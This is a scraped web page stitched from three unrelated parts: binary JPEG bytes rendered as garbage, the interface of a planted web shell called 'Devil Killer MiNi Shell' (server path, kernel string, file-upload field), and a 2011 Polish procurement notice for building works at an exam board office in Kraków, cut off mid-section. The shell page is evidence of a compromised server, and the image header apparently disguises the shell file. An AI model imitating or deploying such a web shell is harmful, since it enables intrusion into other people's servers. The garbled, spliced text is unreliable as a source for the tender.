JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111024/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111024/278789-N-2011.html

<p class="kh_header"><b>Kraków: Wykonanie robót budowlanych w siedzibie Okręgowej Komisji Egzaminacyjnej w Krakowie os. Szkolne 37, 31-978 Kraków</b><br>
<b>Numer ogłoszenia: 278789 - 2011; data zamieszczenia: 24.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowa Komisja Egzaminacyjna w Krakowie , Os. Szkolne 37, 31-978 Kraków, woj. małopolskie, tel. 12 68 32 101,102, faks 12 68 32 100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www,oke.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka budżetowa nadzorowana przez MEN, utworzona na podstawie Ustawy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w siedzibie Okręgowej Komisji Egzaminacyjnej w Krakowie os. Szkolne 37, 31-978 Kraków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w niniejszym postępowaniu są roboty budowlane przeprowadzone w części wschodniej budynku os. Szkolne 37, 31-978 Kraków użyczonej Okręgowej Komisji Egzaminacyjnej w Krakowie na prowadzenie działalności statutowej. 
Budynek zlokalizowany jest w obszarze urbanistycznym Nowej Huty wpisanym do rejestru zabytków (A-1132). 
Roboty budowlane, które opisano poniżej stanowią kontynuację robót objętych pozwoleniem na budowę (decyzja Prezydenta Miasta Krakowa nr 304/09) i przeprowadzane będą w oparciu o opis przedmiotu zamówienia, specyfikację techniczną wykonania i odbioru robót w zakresie objętym załączonymi do SIWZ przedmiarami robót.
ZAKRES ROBÓT DO WYKONANIA 1.Adaptacja pomieszczenia pod tarasem od strony ul. Bulwarowej na magazyn w tym:
1.1 Zabudowa ścianki rozdzielającej pomieszczenie - rys A-7	
1.2 Malowanie pomieszczenia  w części OKE - rys. A-7	
1.3 Odwodnienie przed pomieszczeniem pod tarasem - rys. A-7	
2. Wykonanie chodników przed schodami tarasu - rys. A-8	
3. Roboty na części dachu budynku -rys.Z-1, A-11 w tym:
3.1	Wymiana pokrycia dachu 	
3.2	Renowacja kominów i wywiewek wentylacyjnych 	 
3.3	Wymiana instalacji odgromowej 	
3.4	Wywóz gruzu, utylizacja papy, wykonanie daszków zabezpiecz., wzmocnienie posadowienia skraplaczy klimatyzatorów	
4. Ocieplenie strychu -  zgodnie z projektem wełna mineralna 20 cm,   podejście do włazu dachowego warstwa zbrojonej posadzki cementowej na styropianie, po uprzednim usunięciu zbędnego gruzu i śmieci - rys. Z-1, A-11	
5.Wykonanie ogrodzenia terenu - rys. Z-1, A-11	
(UWAGA: Całość dokumentacji projektowej dotycząca części budynku, w którym prowadzone będą roboty budowlane objęte niniejszym zamówieniem dostępna jest do pobrania, w przypadku takiej konieczności, na stronie www.oke.krakow.pl  - zamówienia publiczne - przetarg na roboty budowlane z 2009 r.)

Opis robót do wykonania. 
1.	Adaptacja pomieszczenia pod tarasem od strony ul. Bulwarowej na magazyn:
1.1. Zabudowa ścianki oddzielającej część OKE od części wykorzystywanej przez ZSM 
	- płyta GK ognioodporna na rusztach metalowych.
1.2. Malowanie pomieszczenia. 
1.3. Wykonanie odwodnienia liniowego przed pomieszczeniem pod tarasem, z wymianą przykrycia włazu nastudziennego.
       
2.	Wykonanie chodników przed schodami na taras polegający na rozebraniu istniejących fragmentów chodnika, wykonaniu nowej podbudowy i ułożeniu nowej nawierzchni.

3.	Roboty dachowe na części budynku użytkowanego przez OKE w Krakowie w tym:
3.1. Wymiana pokrycia dachu polegająca na:
1)	rozbiórce istniejącego pokrycia  z papy;
2)	rozebraniu obróbek blacharskich;
3)	zerwaniu  zmurszałego podłoża  betonowego - ok. 15 % powierzchni dachu;
4)	uzupełnieniu podłoża  betonowego;
5)	wykonaniu niezbędnych obróbek blacharskich;
6)	zagruntowaniu podłoża roztworem asfaltowym;
7)	pokryciu dachu  dwoma warstwami papy:  podkładową o grubości nie  mniejszej niż 3,5 mm i nawierzchniową o grubości 5,2 mm (do wykonania  pokrycia papowego należy zastosować papy zgrzewalne modyfikowane SBS, europejskiej generacji- wg zharmonizowanej normy PN-EN 13707+Aneks  A2:2009); 
8)	wykonaniu obróbek wokół kominów  z papy nawierzchniowej , zakończonych listwami systemowymi i wypełnieniu szczelin kitem trwale plastycznym.
      3.2. Renowacja kominów i wywiewek polegająca na:
1)	naprawie czapek kominowych,
2)	odbiciu i uzupełnieniu tynków na ścianach pionowych kominów,
3)	zagruntowaniu podłoża  emulsją gruntującą,
4)	przyklejeniu warstwy siatki na ścianach z zastosowaniem narożników,
5)	wykończeniu wyprawą  cienkowarstwową akrylową,
6)	założeniu siatek  przed ptakami na otworach wentylacyjnych,
7)	wymianie rur wywiewnych żeliwnych na rury  wywiewne  PCV,
8)	oczyszczeniu i zabezpieczeniu antykorozyjnym  istniejących elementów  metalowych. 
3.3.  Wymiana  instalacji odgromowej polegająca na:
      1) demontażu istniejącej instalacji na części budynku użytkowanego przez OKE,
      2) wykonaniu nowej instalacji (zwody poziome i pionowe, uziom powierzchniowy),              
      3) wykonaniu pomiarów wraz ze sporządzeniem protokołu.
Wymiana instalacji piorunochronnej na dachu budynku os. Szkolne 37 w części użytkowanej przez OKE w Krakowie powinno być wykonane zgodnie z obowiązującymi 
w tym względzie przepisami i normami wraz ze sprawdzeniem pomiarami instalacji piorunochronnej w zakresie stanu sprawności połączeń i osprzętu. 
Po wymianie instalacji piorunochronnej wykonawca jest zobowiązany do dostarczenia kompletnej dokumentacji powykonawczej, którą stanowią: metryka urządzenia piorunochronnego oraz protokół pomiarów instalacji odgromowej tj. pomiar rezystancji uziomów, pomiar całości instalacji, pomiar ciągłości instalacji oraz schemat ogólny. 
Wykonawca zobowiązany jest posiadać stosowne uprawnienia kontrolno- pomiarowe 
w zakresie objętym zamówieniem.

3.4. Wywóz gruzu, utylizacja papy, wykonanie daszków zabezpieczających na czas robót na dachu oraz wykonanie wzmocnienia pokrycia dachowego w miejscu posadowienia 8 szt. skraplaczy urządzeń klimatyzacyjnych typu Split.

4.	Ocieplenie stropodachu płytami gr. 20 cm z wełny mineralnej, polegające na:
1)	usunięciu gruzu i śmieci z powierzchni podlegającej ociepleniu,
2)	zabezpieczeniu podłóg folią,
3)	rozłożeniu i przymocowaniu izolacji z wełny mineralnej,
4)	wykonaniu zbrojonej posadzki cementowej na warstwie styropianu stanowiącej przejście do włazu dachowego.

5.	Wykonanie ogrodzenia terenu ograniczającego dostęp przypadkowych osób do tarasu stanowiącego wejście do OKE w Krakowie, wg schematu - Projekt zagospodarowania terenu rys. nr Z-1 - załącznik A do SIWZ, polegające na: 
5.1. Posadowieniu słupków systemowych ogrodzenia w stopach betonowych i montażu przęseł systemowych.
6.2. Montażu bramy podwójnej systemowej na gotowych słupkach.
6.3. Montażu bramki systemowej na gotowych słupkach.
System panelowy typu Nylofor 3D z prętów zgrzewanych punktowo (średnica prętów ogrodzenia min. 5 mm), lub równoważny pod względem wizualnym, funkcjonalnym oraz jakości zastosowanych materiałów. Całość zabezpieczona antykorozyjnie: ocynkowanie + powłoka poliestrowa.
Jeżeli w opisie przedmiotu zamówienia, przedmiarach, specyfikacji technicznej lub innych dokumentach wskazano jakikolwiek znak towarowy, patent czy pochodzenie zastosowanych materiałów i urządzeń - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają ich parametry techniczne, eksploatacyjne i użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty przy zastosowaniu materiałów i urządzeń o równoważnych parametrach technicznych, eksploatacyjnych i użytkowych nie gorszych od wskazanych.



B. Inne informacje dotyczące przedmiotu zamówienia

1. Do  zadań Wykonawcy realizowanych w ramach niniejszego zamówienia należy 
w szczególności:
1.1. wykonanie przedmiotu zamówienia zgodnie z opisem, specyfikacjami technicznymi wykonania 
i odbioru robót, obowiązującymi przepisami, normami, decyzjami Zamawiającego oraz zasadami wiedzy technicznej i sztuką budowlaną;
1.2.  wykonanie przedmiotu umowy przy użyciu materiałów dostarczonych przez Wykonawcę, wskazanych w dokumentacji lub im równoważnych oraz wykorzystywanie materiałów posiadających udokumentowane świadectwa dopuszczenia do stosowania w budownictwie (zastosowane materiały muszą posiadać certyfikaty na znak bezpieczeństwa oraz certyfikaty p. poż. -gdy są wymagane). Stosowane materiały muszą posiadać stosowne atesty, muszą być zgodne 
z kryteriami technicznymi określonymi w polskich normach i szczegółowych specyfikacjach wykonania i odbioru robót oraz zgodne z właściwymi przepisami, aprobatami technicznymi 
i dokumentami technicznymi; 
1.3.  dostarczenie i wbudowanie w czasie realizacji zamówienia materiałów i urządzeń w ilościach 
i rodzajach wynikających z załączonych przedmiarów, jak również wynikających z opisanego zakresu przedmiotu zamówienia w przypadku pominięcia ich w przedmiarach, co należy uwzględnić w kosztorysach ofertowych i w cenie ofertowej; 
1.4.  przejęcie od Zamawiającego terenu robót budowlanych;
1.5.  zabezpieczenie robót pod względem BHP oraz bezpieczeństwa osób trzecich i wpływów atmosferycznych;
1.6.  wykonywanie obowiązków Gwaranta w okresie wskazanym w umowie;
1.7.  ponoszenie wobec Zamawiającego pełnej odpowiedzialności za realizację przedmiotu umowy;
1.8. ponoszenie skutków prawnych oraz finansowych za istotne zmiany wprowadzone 
z własnej inicjatywy w trakcie realizacji inwestycji bez akceptacji Zamawiającego;
1.9. wykonanie przedmiotu umowy w taki sposób aby nie dezorganizować pracy osobom zatrudnionym 
w budynku i nie utrudniać funkcjowania instytucji korzystających z nieruchomości i jej najbliższego otoczenia;
1.10. dostarczenie na własny  koszt i ryzyko w ramach  wynagrodzenia za przedmiot umowy wszelkich niezbędnych materiałów, wyposażenia  technicznego i sprzętu oraz zapewnienie odpowiednio wykwalifikowanego  personelu i nadzoru do sprawowania funkcji kierownika budowy;
1.11. sporządzenie dokumentacji powykonawczej, wykonanie niezbędnych testów i pomiarów oraz przygotowanie dokumentacji odbiorowej i kosztorysów powykonawczych stanowiących podstawę do wypłaty wynagrodzenia.
1.12. zgłaszanie - w przypadku wystąpienia takiej konieczności - do dostawców mediów faktu remontu instalacji dla tych mediów oraz spowodowanie przyłączenia wyremontowanych instalacji do istniejących systemów pomiarowych i sterujących, a także spowodowanie zamontowania i zaplombowania systemów pomiarowych. Wykonawca ponosi odpowiedzialność za istniejące systemy pomiarowe i sterujące dla zainstalowanych przez dostawców na terenie budowy mediów oraz za naruszenie plomb i innych zabezpieczeń tych systemów, od dnia przejęcia terenu prac od Zamawiającego do dnia podpisania protokołu odbioru końcowego.

2. Zamawiający zastrzega sobie możliwość rezygnacji z części zamówienia i zmiany decyzji, co do zakresu wykonywanych robót przed rozpoczęciem ich wykonywania. 
Zmniejszenie zakresu realizowanych robót wymienionych w SIWZ nie może być podstawą do żadnych roszczeń Wykonawcy w stosunku do Zamawiającego.

3. Wymagany okres gwarancji:  na wykonane roboty (materiały wraz z robocizną) Zamawiający wymaga udzielenia gwarancji na okres minimum 5 lat. Na dostarczone materiały i urządzenia w ramach wykonywanych robót - gwarancja taka, jaką dają ich producenci. 

4. Za niewłaściwe wykonanie zamówienia przewiduje się kary umowne na zasadach określonych w projekcie umowy (załącznik nr 3 do SIWZ).

5. Zamawiający zaleca Wykonawcom, przed złożeniem oferty, dokonanie z należytą starannością wizji lokalnej w miejscu prowadzenia robót w celu szczegółowego zapoznania się ze specyfiką, charakterem 
i uwarunkowaniami mogącymi dotyczyć realizacji zamówienia. Zamawiający nie uwzględni żadnych zarzutów Wykonawcy w czasie realizacji zamówienia, wynikających z nieznajomości przez Wykonawcę specyfiki, charakteru i zakresu robót, jeżeli okoliczności te możliwe były do ustalenia 
w czasie wizji lokalnej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający nie wyklucza udzielenia zamówień uzupełniających polegających na powtórzeniu  zamówień robót budowlanych, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.54-4, 45.44.21.00-8, 45.33.00.00-9, 45.23.32.22-1, 45.26.12.10-9, 45.26.26.00-7, 45.21.23.11-0, 45.11.30.00-2, 45.26.14.10-1, 45.34.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie-weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia Zamawiający, żąda by Wykonawca wykazał, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2 roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, wskazał odbiorców tych robót i załączył dokumenty potwierdzające ich należyte wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowe zakończenie. Za roboty odpowiadające swoim rodzajem i wartością Zamawiający uważa wykonanie robót budowlanych i remontowych obejmujących swoim zakresem również roboty wymiany pokrycia dachowego oraz wymiany instalacji odgromowych o wartości  łącznej nie mniejszej niż 150000 zł brutto. 

Weryfikacja nastąpi na podstawie złożonego wraz z ofertą wykazu informacji wg załącznika nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym Zamawiający wymaga aby Wykonawca opisał posiadany potencjał techniczny w postaci urządzeń technicznych, podstawowego sprzętu budowlanego i transportowego, jakim dysponuje lub będzie dysponował przy realizacji zamówienia - Zamawiający nie określa szczegółowych wymagań w tym zakresie. Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek dysponowania osobami  zdolnymi do wykonania zamówienia  Zamawiający żąda, aby Wykonawca w złożonym oświadczeniu: a) określił wielkość średniego rocznego zatrudnienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie (wymaga się wykazania średniego rocznego zatrudnienia w liczbie minimum 10 wykwalifikowanych pracowników);
b) wskazał, że dysponuje osobami posiadającymi uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. 2003, Nr 207, poz. 2016 ze zm.) w zakresie:
- kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, oraz posiadającymi aktualne zaświadczenia o członkostwie we właściwych izbach samorządu zawodowego;		
-  kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci dedykowanych, instalacji i urządzeń elektrycznych oraz urządzeń elektroenergetycznych posiadającymi uprawnienia  do wykonywania pomiarów ochronnych oraz posiadającymi aktualne zaświadczenia o członkostwie we właściwych izbach samorządu zawodowego;
-  kierowania robotami budowlanymi w specjalności instalacji sanitarnych oraz posiadającymi aktualne zaświadczenia o członkostwie we właściwych izbach samorządu zawodowego. 
(Wymagane jest dysponowanie co najmniej jedną osobą posiadającą wskazane uprawnienia i podanie informacji o podstawie dysponowania tymi osobami. Wykaz osób odpowiedzialnych za kierowanie robotami budowlanymi wg załącznika nr 7 do SIWZ wymagany będzie do podpisania umowy).

Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający żąda opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o sumie gwarancyjnej ubezpieczenia nie mniejszej niż 100 000 zł. 

 Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 4 do SIWZ i załącznika 6 do SIWZ z kopią polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz ofertowy zawierający wymaganą do ważności oferty treść wg wzoru przedstawionego w załączniku nr 1 do SIWZ wraz z załącznikiem nr 2 do SIWZ - Formularzem cenowym, który należy poprawnie wyliczyć. 
